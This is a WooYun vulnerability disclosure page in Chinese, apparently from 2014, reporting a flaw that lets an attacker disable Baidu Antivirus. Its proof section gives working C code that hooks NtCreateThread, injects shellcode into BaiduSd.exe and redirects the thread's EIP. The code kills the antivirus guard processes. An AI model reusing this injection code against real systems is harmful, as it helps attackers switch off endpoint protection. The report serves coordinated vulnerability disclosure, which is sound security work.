百度杀毒冰山全防御失效漏洞 | wooyun-2014-082154| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-082154

漏洞标题：百度杀毒冰山全防御失效漏洞

漏洞作者： alvin

提交时间：2014-11-06 18:51

修复时间：2015-02-04 18:52

公开时间：2015-02-04 18:52

漏洞类型：权限提升

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-11-06：细节已通知厂商并且等待厂商处理中
2014-11-07：厂商已经确认，细节仅向厂商公开
2014-11-10：细节向第三方安全合作伙伴开放
2015-01-01：细节向核心白帽子及相关领域专家公开
2015-01-11：细节向普通白帽子公开
2015-01-21：细节向实习白帽子公开
2015-02-04：细节向公众公开

简要描述：

缺少对线程CONTEXT的防御，导致BaiduSd.exe的eip被控制，执行任意代码

详细说明：

攻击触发之前：

攻击触发之后：

百度杀毒守护进程全都被杀掉

漏洞证明：

LONG WINAPI FakeNtCreateThread(PVOID p1, PVOID p2, PVOID p3, PVOID p4, PVOID p5, PVOID p6, PVOID p7,PVOID p8)
{	
	PBYTE pBase = (PBYTE)VirtualAllocEx(p4, NULL, 0x400, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if(pBase)
	{	
 		BYTE code[] = 
		{
			0x90, 0x90, 0x90, 0x8b, 0xec, 0x81, 0xec, 0x00, 
			0x01, 0x00, 0x00, 0x68, 0x0c, 0x0c, 0x0c, 0x0c, 
			0x6a, 0x00, 0x6a, 0x01, 0xb9, 0xd1, 0x09, 0x83, 
			0x7c, 0xff, 0xd1, 0x6a, 0x02, 0x50, 0xb9, 0x1a, 
			0x1e, 0x80, 0x7c, 0xff, 0xd1, 0x68, 0x0c, 0x0c, 
			0x0c, 0x0c, 0x6a, 0x00, 0x6a, 0x01, 0xb9, 0xd1, 	
			0x09, 0x83, 0x7c, 0xff, 0xd1, 0x6a, 0x02, 0x50, 
			0xb9, 0x1a, 0x1e, 0x80, 0x7c, 0xff, 0xd1, 0x6a, 
			0x00, 0x6a, 0xff, 0xb9, 0x1a, 0x1e, 0x80, 0x7c, 
			0xff, 0xd1, 0x00, 
		};
		BOOL bWrite = FALSE;
		DWORD dwWritten = 0;
		bWrite = WriteProcessMemory(p4, (LPVOID)pBase, code, sizeof(code), &dwWritten);
		*((DWORD*)((PBYTE)p6 + 0xb0)) = (DWORD)pBase;
	}
	return (fnNtCreateThread)(p1, p2, p3, p4, p5, p6,p7,p8);
}
void main()
{
	PROCESS_INFORMATION pi = { 0 };
	STARTUPINFO si = { 0 };
	si.cb = sizeof(STARTUPINFO);
	DWORD old = (DWORD)GetProcAddress(GetModuleHandle(_T("ntdll")), "NtCreateThread");
	DetourProc((PVOID)old, (PVOID)FakeNtCreateThread, (PVOID*)(&fnNtCreateThread));
	CreateProcess("C:\\Program Files\\Baidu\\BaiduSd\\3.0.0.4605\\BaiduSd.exe", NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
}

修复方案：

增加对线程CONTEXT的防御

版权声明：转载请注明来源 alvin@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2014-11-07 11:22

厂商回复：

感谢提交，我们已经通知业务部门处理此问题。

漏洞评价：

2014-11-06 19:00 | zzR ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1：5 无限量收 [平台担保])

ip6 送给你！
2014-11-06 23:41 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天，我会骑着雨牛@'雨。踩着一哥@jan...)

屌成这个鬼样子
2014-11-07 11:16 | 大漠長河 ( 实习白帽子 | Rank:43 漏洞数:7 | ̷̸̨̀͒̏̃ͦ̈́̾( 天龙源景区欢迎您...)

少对线程CONTEXT的防御，导致BaiduSd.exe的eip被控制，执行任意代码描述的可能太详细了
2014-11-07 11:45 | 写个七 ( 路人 | Rank:4 漏洞数:1 | 一点一点积累。)

.......

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-082154

漏洞标题：百度杀毒冰山全防御失效漏洞

相关厂商：百度

漏洞作者： alvin

提交时间：2014-11-06 18:51

修复时间：2015-02-04 18:52

公开时间：2015-02-04 18:52

漏洞类型：权限提升

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 alvin@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-082154

漏洞标题：百度杀毒冰山全防御失效漏洞

相关厂商：百度

漏洞作者： alvin

提交时间：2014-11-06 18:51

修复时间：2015-02-04 18:52

公开时间：2015-02-04 18:52

漏洞类型：权限提升

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-082154"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 alvin@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：